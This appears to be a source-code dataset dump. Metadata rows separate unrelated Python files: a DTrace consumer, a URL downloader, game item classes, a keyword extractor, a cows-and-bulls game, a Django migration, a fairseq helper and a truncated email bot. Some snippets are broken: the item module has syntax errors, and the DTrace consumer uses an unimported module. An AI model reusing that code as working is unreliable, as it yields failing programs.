Window.RedrawAll()
| 22.914286 | 62 | 0.73192 | 128 | 802 | 4.578125 | 0.710938 | 0.037543 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011817 | 0.15586 | 802 | 34 | 63 | 23.588235 | 0.853767 | 0.315461 | 0 | 0 | 1 | 0 | 0.101695 | 0.094162 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.277778 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
957835505fd0e4beac70b8de003dc1bdf38f88e9 | 9,825 | py | Python | dtrace_ctypes/consumer.py | arichardson/l41-python-dtrace | 19c601660499b3555e2ea800392da5e6fed6b04e | [
"MIT"
] | 1 | 2021-01-07T18:31:16.000Z | 2021-01-07T18:31:16.000Z | dtrace_ctypes/consumer.py | arichardson/l41-python-dtrace | 19c601660499b3555e2ea800392da5e6fed6b04e | [
"MIT"
] | null | null | null | dtrace_ctypes/consumer.py | arichardson/l41-python-dtrace | 19c601660499b3555e2ea800392da5e6fed6b04e | [
"MIT"
] | null | null | null | """
The implementation of the consumer.
Created on Oct 10, 2011
@author: tmetsch
"""
from ctypes import cdll, CDLL, byref, c_int, c_char_p, CFUNCTYPE, c_void_p, \
POINTER, cast
from dtrace_ctypes.dtrace_structs import dtrace_bufdata, dtrace_probedata, \
dtrace_aggdata, dtrace_recdesc
from threading import Thread
import threading
import ctypes
cdll.LoadLibrary("libdtrace.so")
LIBRARY = CDLL("libdtrace.so")
dtrace_open = LIBRARY.dtrace_open
# =============================================================================
# chewing and output walkers
# =============================================================================
CHEW_FUNC = CFUNCTYPE(c_int,
POINTER(dtrace_probedata),
POINTER(c_void_p))
CHEWREC_FUNC = CFUNCTYPE(c_int,
POINTER(dtrace_probedata),
POINTER(dtrace_recdesc),
POINTER(c_void_p))
BUFFERED_FUNC = CFUNCTYPE(c_int,
POINTER(dtrace_bufdata),
POINTER(c_void_p))
WALK_FUNC = CFUNCTYPE(c_int,
POINTER(dtrace_aggdata),
POINTER(c_void_p))
def simple_chew_func(data, arg):
"""
Callback for chew.
"""
print('CPU :', c_int(data.contents.dtpda_cpu).value)
return 0
def simple_chewrec_func(data, rec, arg):
"""
Callback for record chewing.
"""
if rec is None:
return 1
return 0
def simple_buffered_out_writer(bufdata, arg):
"""
In case dtrace_work is given None as filename - this one is called.
"""
tmp = c_char_p(bufdata.contents.dtbda_buffered).value.strip()
print('out >', tmp)
return 0
def simple_walk(data, arg):
"""
Aggregate walker capable of reading a name and one value.
"""
# TODO: pickup the 16 and 272 from offset in desc...
tmp = data.contents.dtada_data
name = cast(tmp + 16, c_char_p).value
instance = deref(tmp + 272, c_int).value
print '{0:60s} :{1:10d}'.format(name, instance)
return 0
# =============================================================================
# Convenience stuff
# =============================================================================
def deref(addr, typ):
"""
Deref a pointer.
"""
return cast(addr, POINTER(typ)).contents
def get_error_msg(handle):
"""
Get the latest and greatest DTrace error.
"""
txt = LIBRARY.dtrace_errmsg(handle, LIBRARY.dtrace_errno(handle))
return c_char_p(txt).value
# =============================================================================
# Consumers
# =============================================================================
class DTraceConsumer(object):
"""
A Pyton based DTrace consumer.
"""
def __init__(self,
chew_func=None,
chew_rec_func=None,
walk_func=None,
out_func=None):
"""
Constructor. will get the DTrace handle
"""
if chew_func is not None:
self.chew = CHEW_FUNC(chew_func)
else:
self.chew = CHEW_FUNC(simple_chew_func)
if chew_rec_func is not None:
self.chew_rec = CHEWREC_FUNC(chew_rec_func)
else:
self.chew_rec = CHEWREC_FUNC(simple_chewrec_func)
if walk_func is not None:
self.walk = WALK_FUNC(walk_func)
else:
self.walk = WALK_FUNC(simple_walk)
if out_func is not None:
self.buf_out = BUFFERED_FUNC(out_func)
else:
self.buf_out = BUFFERED_FUNC(simple_buffered_out_writer)
# get dtrace handle
err = c_int(0)
self.handle = dtrace_open(3, 0, byref(err))
if self.handle is None:
raise Exception('Unable to get a DTrace handle.')
# set buffer options
if LIBRARY.dtrace_setopt(self.handle, 'bufsize', '4m') != 0:
raise Exception(get_error_msg(self.handle))
if LIBRARY.dtrace_setopt(self.handle, 'aggsize', '4m') != 0:
raise Exception(get_error_msg(self.handle))
def __del__(self):
"""
Always close the DTrace handle :-)
"""
LIBRARY.dtrace_close(self.handle)
def run(self, script, runtime=1):
"""
Run a DTrace script for a number of seconds defined by the runtime.
After the run is complete the aggregate is walked. During execution the
stdout of DTrace is redirected to the chew, chewrec and buffered output
writer.
script -- The script to run.
runtime -- The time the script should run in second (Default: 1s).
"""
# set simple output callbacks
if LIBRARY.dtrace_handle_buffered(self.handle, self.buf_out,
None) == -1:
raise Exception('Unable to set the stdout buffered writer.')
# compile
prg = LIBRARY.dtrace_program_strcompile(self.handle,
script, 3, 4, 0, None)
if prg is None:
raise Exception('Unable to compile the script: ',
get_error_msg(self.handle))
# run
if LIBRARY.dtrace_program_exec(self.handle, prg, None) == -1:
raise Exception('Failed to execute: ',
get_error_msg(self.handle))
if LIBRARY.dtrace_go(self.handle) != 0:
raise Exception('Failed to run_script: ',
get_error_msg(self.handle))
# aggregate data for a few sec...
i = 0
while i < runtime:
LIBRARY.dtrace_sleep(self.handle)
LIBRARY.dtrace_work(self.handle, None, self.chew, self.chew_rec,
None)
time.sleep(1)
i += 1
LIBRARY.dtrace_stop(self.handle)
# sorting instead of dtrace_aggregate_walk
if LIBRARY.dtrace_aggregate_walk_valsorted(self.handle,
self.walk,
None) != 0:
raise Exception('Failed to walk the aggregate: ',
get_error_msg(self.handle))
class DTraceConsumerThread(Thread):
"""
Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition.
"""
def __init__(self,
script,
chew_func=None,
chew_rec_func=None,
walk_func=None,
out_func=None):
"""
Constructor. will get the DTrace handle
"""
super(DTraceConsumerThread, self).__init__()
self._stop = threading.Event()
self.script = script
if chew_func is not None:
self.chew = CHEW_FUNC(chew_func)
else:
self.chew = CHEW_FUNC(simple_chew_func)
if chew_rec_func is not None:
self.chew_rec = CHEWREC_FUNC(chew_rec_func)
else:
self.chew_rec = CHEWREC_FUNC(simple_chewrec_func)
if walk_func is not None:
self.walk = WALK_FUNC(walk_func)
else:
self.walk = WALK_FUNC(simple_walk)
if out_func is not None:
self.buf_out = BUFFERED_FUNC(out_func)
else:
self.buf_out = BUFFERED_FUNC(simple_buffered_out_writer)
# get dtrace handle
self.handle = LIBRARY.dtrace_open(3, 0, byref(c_int(0)))
if self.handle is None:
raise Exception('Unable to get a DTrace handle.')
# set buffer options
if LIBRARY.dtrace_setopt(self.handle, 'bufsize', '4m') != 0:
raise Exception(get_error_msg(self.handle))
if LIBRARY.dtrace_setopt(self.handle, 'aggsize', '4m') != 0:
raise Exception(get_error_msg(self.handle))
def run(self):
Thread.run(self)
# set simple output callbacks
if LIBRARY.dtrace_handle_buffered(self.handle, self.buf_out,
None) == -1:
raise Exception('Unable to set the stdout buffered writer.')
# compile
prg = LIBRARY.dtrace_program_strcompile(self.handle,
self.script, 3, 4, 0,
None)
if prg is None:
raise Exception('Unable to compile the script: ',
get_error_msg(self.handle))
# run
if LIBRARY.dtrace_program_exec(self.handle, prg, None) == -1:
raise Exception('Failed to execute: ',
get_error_msg(self.handle))
if LIBRARY.dtrace_go(self.handle) != 0:
raise Exception('Failed to run_script: ',
get_error_msg(self.handle))
# aggregate data for a few sec...
while not self.stopped():
LIBRARY.dtrace_sleep(self.handle)
LIBRARY.dtrace_work(self.handle, None, self.chew, self.chew_rec,
None)
if LIBRARY.dtrace_aggregate_snap(self.handle) != 0:
raise Exception('Failed to snapshot the aggregate: ',
get_error_msg(self.handle))
if LIBRARY.dtrace_aggregate_walk(self.handle, self.walk,
None) != 0:
raise Exception('Failed to walk the aggregate: ',
get_error_msg(self.handle))
LIBRARY.dtrace_stop(self.handle)
def stop(self):
"""
Stop DTrace.
"""
self._stop.set()
def stopped(self):
"""
Used to check the status.
"""
return self._stop.isSet()
| 31.59164 | 79 | 0.533232 | 1,101 | 9,825 | 4.561308 | 0.175295 | 0.077658 | 0.030665 | 0.038829 | 0.591995 | 0.560932 | 0.548984 | 0.540024 | 0.514536 | 0.514536 | 0 | 0.009337 | 0.335064 | 9,825 | 310 | 80 | 31.693548 | 0.759375 | 0.084682 | 0 | 0.619883 | 0 | 0 | 0.059948 | 0 | 0 | 0 | 0 | 0.003226 | 0 | 0 | null | null | 0 | 0.02924 | null | null | 0.017544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
957b97a6d1130326dc3c49e965bf67467c62ded0 | 1,388 | py | Python | opennem/core/downloader.py | paulculmsee/opennem | 9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1 | [
"MIT"
] | null | null | null | opennem/core/downloader.py | paulculmsee/opennem | 9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1 | [
"MIT"
] | null | null | null | opennem/core/downloader.py | paulculmsee/opennem | 9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1 | [
"MIT"
] | null | null | null | import logging
from io import BytesIO
from zipfile import ZipFile
from opennem.utils.handlers import _handle_zip, chain_streams
from opennem.utils.http import http
from opennem.utils.mime import mime_from_content, mime_from_url
logger = logging.getLogger("opennem.downloader")
def url_downloader(url: str) -> bytes:
"""Downloads a URL and returns content, handling embedded zips and other MIME's"""
logger.debug("Downloading: {}".format(url))
r = http.get(url)
if not r.ok:
raise Exception("Bad link returned {}: {}".format(r.status_code, url))
content = BytesIO(r.content)
file_mime = mime_from_content(content)
if not file_mime:
file_mime = mime_from_url(url)
# @TODO handle all this in utils/archive.py
# and make it all generic to handle other
# mime types
if file_mime == "application/zip":
with ZipFile(content) as zf:
if len(zf.namelist()) == 1:
return zf.open(zf.namelist()[0]).read()
c = []
stream_count = 0
for filename in zf.namelist():
if filename.endswith(".zip"):
c.append(_handle_zip(zf.open(filename), "r"))
stream_count += 1
else:
c.append(zf.open(filename))
return chain_streams(c).read()
return content.getvalue()
| 27.76 | 86 | 0.618156 | 181 | 1,388 | 4.618785 | 0.436464 | 0.038278 | 0.057416 | 0.038278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003976 | 0.275216 | 1,388 | 49 | 87 | 28.326531 | 0.827038 | 0.122478 | 0 | 0 | 0 | 0 | 0.063636 | 0 | 0 | 0 | 0 | 0.020408 | 0 | 1 | 0.033333 | false | 0 | 0.2 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
957bb967b951b6436250a6905e698953e9ec010b | 2,667 | py | Python | Item.py | Luigimonbymus/Modern-Quest | de75d38544b97482ef13cb972cc98af591dc72dc | [
"MIT"
] | 1 | 2019-05-15T08:47:39.000Z | 2019-05-15T08:47:39.000Z | Item.py | Luigimonbymus/Modern-Quest | de75d38544b97482ef13cb972cc98af591dc72dc | [
"MIT"
] | null | null | null | Item.py | Luigimonbymus/Modern-Quest | de75d38544b97482ef13cb972cc98af591dc72dc | [
"MIT"
] | null | null | null | class item():
def ___init___(self, name, desc, worth):
self.name=name
self.desc=desc
self.worth=worth
def _str_(self):
return "{}\n=====\n{}\nWorth: {}\n".format(self.name, self.desc, self.worth)
class money(item):
def __init__(self, csh):
self.csh = csh
super().__init__(name="Money",
desc="Dollar bills in cash.",
worth=self.csh)
class weapon(item):
def __init__(self, name, desc, worth, dmg):
self.dmg=dmg
super().__init__(name,desc,value)
def _str_(self):
return "{}\n=====\n{}\nWorth: {}\nDmg: {}".format(self.name, self.desc, self.worth, self.dm)
class Bat(weapon):
def __init__(self):
super().__init__(name="Bat",
desc="Just an ordinary baseball bat.",
worth=3,
dmg=5)
class Stick(weapon):
def __init__(self):
super().__init__(name="Stick",
desc="A weak yet seemingly unbreakable branch from a tree.",
worth=1,
dmg=2)
class Chainsaw(weapon):
def __init__(self):
super().__init__(name="Chainsaw",
desc="This is overkill.",
worth=20,
dmg=15)
class GlassShrd(weapon):
def __init__(self):
super().__init__(name="Glass Shard",
desc="Broken sharp glass. It's a miracle your hand is not bleeding.",
worth=0,
dmg=4)
class Clackers(weapon):
def __init__(self):
super().__init__(name="Clackers",
desc="Balls of steel.",
worth=5,
dmg=5)
class Yoyo(weapon):
def __init__(self):
super().__init__(name="Yoyo",
desc="String plus plastic equals trick shots!",
worth=3,
dmg=5)
class FirstAid(item):
def __init__(self):
super().__init__(name="First-Aid",
desc="Heals your wounds.",
worth=3)
self.heal=10
def healing(self,HP):
#Heals player
class SuperFA(FirstAid):
def __init__(self):
super().__init__(name="Super First-Aid",
desc="A clinic in a box.",
worth=5,
heal=20)
class HyperFA
def __init__(self):
super().__init__(name="Hyper First-Aid",
desc="Surgeon approved.",
worth=10,
heal=30)
| 32.13253 | 100 | 0.478815 | 284 | 2,667 | 4.151408 | 0.323944 | 0.071247 | 0.111959 | 0.122137 | 0.379983 | 0.354538 | 0.293469 | 0 | 0 | 0 | 0 | 0.014879 | 0.395201 | 2,667 | 82 | 101 | 32.52439 | 0.716057 | 0.004499 | 0 | 0.243243 | 0 | 0 | 0.16202 | 0.015825 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95807b1417fb27c5aa763354d0af86eaaf9c1dce | 317 | py | Python | python/py-entrypoints/files/setup.py | svalgaard/macports-ports | b6fce80c90963dac7f3412e9faab3608c29b1dbd | [
"BSD-3-Clause"
] | 1 | 2018-10-10T09:13:56.000Z | 2018-10-10T09:13:56.000Z | python/py-entrypoints/files/setup.py | svalgaard/macports-ports | b6fce80c90963dac7f3412e9faab3608c29b1dbd | [
"BSD-3-Clause"
] | null | null | null | python/py-entrypoints/files/setup.py | svalgaard/macports-ports | b6fce80c90963dac7f3412e9faab3608c29b1dbd | [
"BSD-3-Clause"
] | null | null | null | from distutils.core import setup
setup(
name='entrypoints',
version='0.2.2',
description='Discover and load entry points from installed packages.',
author='Thomas Kluyver',
author_email='thomas@kluyver.me.uk',
url='https://github.com/takluyver/entrypoints',
py_modules=['entrypoints'],
)
| 26.416667 | 74 | 0.700315 | 39 | 317 | 5.641026 | 0.794872 | 0.118182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011236 | 0.157729 | 317 | 11 | 75 | 28.818182 | 0.812734 | 0 | 0 | 0 | 0 | 0 | 0.492114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9582e33c487932c08833d1d3b0720ebec9ba2f4f | 4,706 | py | Python | Jarvis/BadDataDetector/get_keywords.py | rafarrel/Jarvis | 0a229ea196db8642537efa2b290fb6f22f4254c4 | [
"MIT"
] | null | null | null | Jarvis/BadDataDetector/get_keywords.py | rafarrel/Jarvis | 0a229ea196db8642537efa2b290fb6f22f4254c4 | [
"MIT"
] | 1 | 2021-11-09T19:27:13.000Z | 2021-11-09T19:27:13.000Z | Jarvis/BadDataDetector/get_keywords.py | rafarrel/Jarvis | 0a229ea196db8642537efa2b290fb6f22f4254c4 | [
"MIT"
] | null | null | null | """
This file was used to generate the keywords used in the bad data detector.
We manually edited/cleaned the generated keywords after to better reflect the
data and remove fringe/minimally related keywords that don't convey any
meaning.
DO NOT RUN THIS FILE as it will overwrite our cleaned keywords.
"""
##############################
# IMPORTS #
##############################
import os
import re
import json
from string import punctuation
from collections import Counter
import nltk
from nltk.corpus import stopwords
##############################
# FUNCTIONS #
##############################
def clean_data(data):
"""Pre-process data to remove things that don't convey mearning."""
# Stuff to remove
exclude = set(punctuation)
stop_words = stopwords.words('english')
# Remove stop words
text_tokenize = data['TXT'].lower().split(' ')
removed_stop = [token for token in text_tokenize if not token in stop_words]
removed_stop = " ".join(removed_stop)
# Remove punctuation
removed_punc = [char for char in removed_stop if char not in exclude]
data['TXT'] = "".join(removed_punc).rstrip(' ')
def load_data(directory_name):
"""Load data into a list of [txt, action] pairs from all files for
processing of keywords."""
# Initialize
data = []
# Loads contents of data files into a master dictionary with key:value pairs ACTION:TXT
training_files = os.listdir(os.path.join(os.getcwd(), directory_name))
for training_file in training_files:
filename = os.path.join(directory_name, training_file)
with open(filename, 'r') as file:
for line in file:
try:
# Convert each line to dict
line_dict = json.loads(line)
except:
# Separate only at commas that are followed by all caps
# text without a space (Action label is the all the caps thing)
txt_action_values = re.split(r',([A-Z]+)', line)
# Use try to skip over improperly formatted data
try:
# Convert each line to dict
line_dict = {'TXT':txt_action_values[0], 'ACTION':txt_action_values[1]}
except:
pass
finally:
# Clean data and append to list of lists
clean_data(line_dict)
data.append([line_dict['TXT'], line_dict['ACTION']])
# return a list of lists
return data
##############################
# MAIN CODE #
##############################
if __name__ == '__main__':
# UNCOMMENT THESE IF NEED TO DOWNLOAD
#nltk.download('punkt')
#nltk.download('stopwords')
# Load all data
data = load_data('OriginalTrainingData')
# Converts data to a list of lists where outer list is the actions
# and the inner list is all words for those actions
dat = []
actions = ['PIZZA', 'JOKE', 'WEATHER', 'GREET', 'TIME']
for action in actions:
txt_dat = []
for datapt in data:
if datapt[1] == action:
txt_dat = txt_dat + datapt[0].split(' ')
dat.append(txt_dat)
# Initialize counter objects for each action
counters = [Counter(),Counter(),Counter(),Counter(),Counter()]
# Update each counter with the data from dat
for i in range(5):
counters[i].update(dat[i])
# Initialize list for keywords for each action
keys = [[], [], [], [], []]
for i in range(5):
for word in counters[i].keys():
# Initialize array to be filled with boolean if
unique = []
for j in range(5):
# Test if word is at least 10x more prevalent for action i
# than any other action, if so append True to unique
if i != j and counters[j][word]*10 < counters[i][word]:
unique.append(True)
# Test if condition was true for all 4 other actions, if so
# qualifies as a keyword for action i
if sum(unique) == 4:
keys[i].append(word)
# Saves each keyword into a separate .txt file for later use
for i in range(5):
with open('KeywordData/keys_{}.txt'.format(actions[i].lower()), 'w') as file:
for word in keys[i]:
# Use try to skip over words with non-compatable characters
try:
file.write(word + '\n')
except:
pass | 36.48062 | 95 | 0.551849 | 576 | 4,706 | 4.430556 | 0.34375 | 0.015674 | 0.012539 | 0.012931 | 0.051724 | 0.025078 | 0.025078 | 0.025078 | 0 | 0 | 0 | 0.004416 | 0.326392 | 4,706 | 129 | 96 | 36.48062 | 0.800631 | 0.355504 | 0 | 0.174603 | 1 | 0 | 0.044302 | 0.008217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031746 | false | 0.031746 | 0.111111 | 0 | 0.15873 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95930bf39240faf5c32905a77cd64dcc308bab13 | 2,002 | py | Python | main.py | ahsankhatri/cows-and-bulls | 8bff56cd112d652b7da4d7479634110daf42d1c7 | [
"MIT"
] | null | null | null | main.py | ahsankhatri/cows-and-bulls | 8bff56cd112d652b7da4d7479634110daf42d1c7 | [
"MIT"
] | null | null | null | main.py | ahsankhatri/cows-and-bulls | 8bff56cd112d652b7da4d7479634110daf42d1c7 | [
"MIT"
] | null | null | null | import random
import time
def ask_input(text=""):
try:
enteredNumber = (input(("Enter a 3-digit number:" if text == "" else text) + "\n>>>> "))
startTime()
if len(str(abs(enteredNumber))) != 3:
raise ValueError
else:
return str(enteredNumber)
except ValueError as valueE:
return ask_input("You exactly need to provide 3-digit number:")
except Exception as error:
startTime()
return ask_input("You did not entered number, please enter a number:")
def findForMatch(answer, guessNumber):
cows = bulls = 0
i = 0
temp = list(guessNumber)
for x in list(answer):
if answer[i] == guessNumber[i]:
cows += 1
if x in temp:
temp.remove(x)
bulls += 1
i += 1
bulls -= cows
return [cows,bulls]
def startTime():
global startedTime
if startedTime == 0:
startedTime = time.time()
print "\nWelcome to cows and bulls game!\n"
print "We have a number and you need to guess it, we'll try to give some hints. You need to find out the actual number."
print "TIP: Number does not start with zero\n"
answer = str(random.randint(100, 999))
guessNumber = 0
attempts = 0
startedTime = 0
# print answer # Print answer (for debugging purpose)
while answer != guessNumber:
# print guessNumber # for debugging purpose
guessNumber = ask_input("" if guessNumber == 0 else " ")
[cows, bulls] = findForMatch(answer, guessNumber)
attempts += 1
if cows != 3:
print "You got", cows, "cows and", bulls, "bulls. Try again."
diff = int(time.time() - startedTime)
minutes, seconds = diff // 60, diff % 60
print "\nCongrats! You got all the cows correct in", attempts, "attempts and you took " + str(minutes).zfill(2) + ':' + str(seconds).zfill(2), 'seconds'
# Save user data for future statistics
with open('history.txt', 'a') as historyFile:
historyFile.write(answer+'|'+str(attempts)+'|'+str(diff)+"\n")
| 28.6 | 152 | 0.626374 | 268 | 2,002 | 4.664179 | 0.391791 | 0.0256 | 0.0192 | 0.0272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018036 | 0.252248 | 2,002 | 69 | 153 | 29.014493 | 0.816967 | 0.063936 | 0 | 0.04 | 0 | 0.02 | 0.230193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.04 | null | null | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9597928473fbb393149208377f08ae5bac78fb1e | 1,083 | py | Python | correctiv_eurosfueraerzte/migrations/0022_auto_20170323_1642.py | correctiv/correctiv-eurosfueraerzte | 291c358d65eccf06034e409d888de56a4545c7b7 | [
"MIT"
] | 4 | 2016-09-24T07:27:49.000Z | 2021-11-08T12:14:30.000Z | correctiv_eurosfueraerzte/migrations/0022_auto_20170323_1642.py | correctiv/correctiv-eurosfueraerzte | 291c358d65eccf06034e409d888de56a4545c7b7 | [
"MIT"
] | 5 | 2020-06-05T17:33:30.000Z | 2022-03-11T23:16:18.000Z | correctiv_eurosfueraerzte/migrations/0022_auto_20170323_1642.py | correctiv/correctiv-eurosfueraerzte | 291c358d65eccf06034e409d888de56a4545c7b7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-23 15:42
from __future__ import unicode_literals
import django.contrib.postgres.fields.hstore
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('correctiv_eurosfueraerzte', '0021_paymentrecipient_aggs'),
]
operations = [
migrations.AddField(
model_name='zerodoctor',
name='address_type',
field=models.CharField(blank=True, max_length=50),
),
migrations.AddField(
model_name='zerodoctor',
name='specialisation',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='zerodoctor',
name='web',
field=models.URLField(blank=True, max_length=1024),
),
migrations.AlterField(
model_name='paymentrecipient',
name='data',
field=django.contrib.postgres.fields.hstore.HStoreField(blank=True, default=dict),
),
]
| 29.27027 | 94 | 0.612188 | 107 | 1,083 | 6.046729 | 0.551402 | 0.055641 | 0.106646 | 0.125193 | 0.409583 | 0.307573 | 0.117465 | 0 | 0 | 0 | 0 | 0.038168 | 0.274238 | 1,083 | 36 | 95 | 30.083333 | 0.784987 | 0.062789 | 0 | 0.344828 | 1 | 0 | 0.128459 | 0.050395 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.103448 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
959ed2b25597cf2f55e6ec015c6386ac580728db | 1,100 | py | Python | fairseq_ext/binarize.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 76 | 2019-11-25T04:00:15.000Z | 2022-03-31T00:33:44.000Z | fairseq_ext/binarize.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 22 | 2019-10-10T09:39:24.000Z | 2022-03-28T06:39:06.000Z | fairseq_ext/binarize.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 20 | 2019-10-08T17:02:17.000Z | 2022-03-20T01:43:42.000Z | import numpy as np
import torch
from fairseq.data.indexed_dataset import __best_fitting_dtype, MMapIndexedDatasetBuilder, IndexedDatasetBuilder
from fairseq.tokenizer import tokenize_line
# TODO move this file into data folder
def make_builder(out_file, impl, vocab_size=None, dtype=None):
if impl == 'mmap':
if dtype is None:
dtype = __best_fitting_dtype(vocab_size)
return MMapIndexedDatasetBuilder(out_file, dtype=dtype)
else:
return IndexedDatasetBuilder(out_file)
def binarize_file(input_file, out_file_pref, impl, dtype=np.int64, tokenize=tokenize_line):
out_file = out_file_pref + '.bin'
index_file = out_file_pref + '.idx'
ds = make_builder(out_file, impl=impl, dtype=dtype)
with open(input_file, 'r') as f:
for line in f:
if line.strip():
line = tokenize_line(line)
line = list(map(int, line))
line = torch.tensor(line)
ds.add_item(line)
else:
raise Exception('empty line')
ds.finalize(index_file)
return
| 32.352941 | 111 | 0.660909 | 142 | 1,100 | 4.887324 | 0.43662 | 0.080692 | 0.04755 | 0.064842 | 0.063401 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002442 | 0.255455 | 1,100 | 33 | 112 | 33.333333 | 0.844933 | 0.032727 | 0 | 0.076923 | 0 | 0 | 0.021657 | 0 | 0 | 0 | 0 | 0.030303 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.346154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
959fcd35d03e21f435fba90bd2bddd6135da433b | 3,535 | py | Python | boomerang.py | codegolfer/boomerang | 8b4b93ed4eecafd8bc26c3a806150ed55737bffa | [
"Apache-2.0"
] | null | null | null | boomerang.py | codegolfer/boomerang | 8b4b93ed4eecafd8bc26c3a806150ed55737bffa | [
"Apache-2.0"
] | null | null | null | boomerang.py | codegolfer/boomerang | 8b4b93ed4eecafd8bc26c3a806150ed55737bffa | [
"Apache-2.0"
] | null | null | null | """
bot implementation.
"""
import os
import boto3
from botocore.exceptions import ClientError
import sendgrid
import ciscospark
# Sets config values from the config file
ACCESS_TOKEN_SPARK = "Bearer " + os.environ['access_token_spark']
MYSELF = os.environ['my_person_id']
SENDGRID_API_TOKEN = os.environ['sendgrid_api_token']
AWS_REGION = "us-west-2"
CHARSET = "UTF-8"
SENDER = 'boomerang.spark@aol.com'
SENDER_NAME = 'boomerang'
def mask_email(email):
"""
masks important part of email
"""
at_index = email.find('@')
email_substring_to_mask = email[1:at_index]
masked_email = email.replace(
email_substring_to_mask, '*' * len(email_substring_to_mask))
return masked_email
def send_email(subject, plaintext_email, recipient):
"""
sends email via Sendgrid
"""
sendgrid.send_email(SENDGRID_API_TOKEN, SENDER_NAME,
SENDER, recipient, subject, plaintext_email)
def send_email_ses(subject, plaintext_email, recipient):
"""
sends email via SES
"""
# Create a new SES resource and specify a region.
client = boto3.client('ses', region_name=AWS_REGION)
# Try to send the email.
try:
#Provide the contents of the email.
response = client.send_email(
Destination={
'ToAddresses': [
recipient,
],
},
Message={
'Body': {
'Text': {
'Charset': CHARSET,
'Data': plaintext_email,
},
},
'Subject': {
'Charset': CHARSET,
'Data': subject,
},
},
Source=SENDER,
)
# Display an error if something goes wrong.
except ClientError as e:
print e.response['Error']['Message']
else:
print "Email sent! Message ID:",
print response['ResponseMetadata']['RequestId']
def handler(event, context):
"""
boomerang
"""
# print "Event is {0}".format(event)
person_email = None
try:
room_id = event['data']['roomId']
message_id = event['data']['id']
person_id = event['data']['personId']
person_email = event['data']['personEmail']
print "Consumer: {}".format(person_email)
except KeyError as error:
print "Duh - key error %r" % error
return False
if person_id == MYSELF:
return False
if person_email is None:
return False
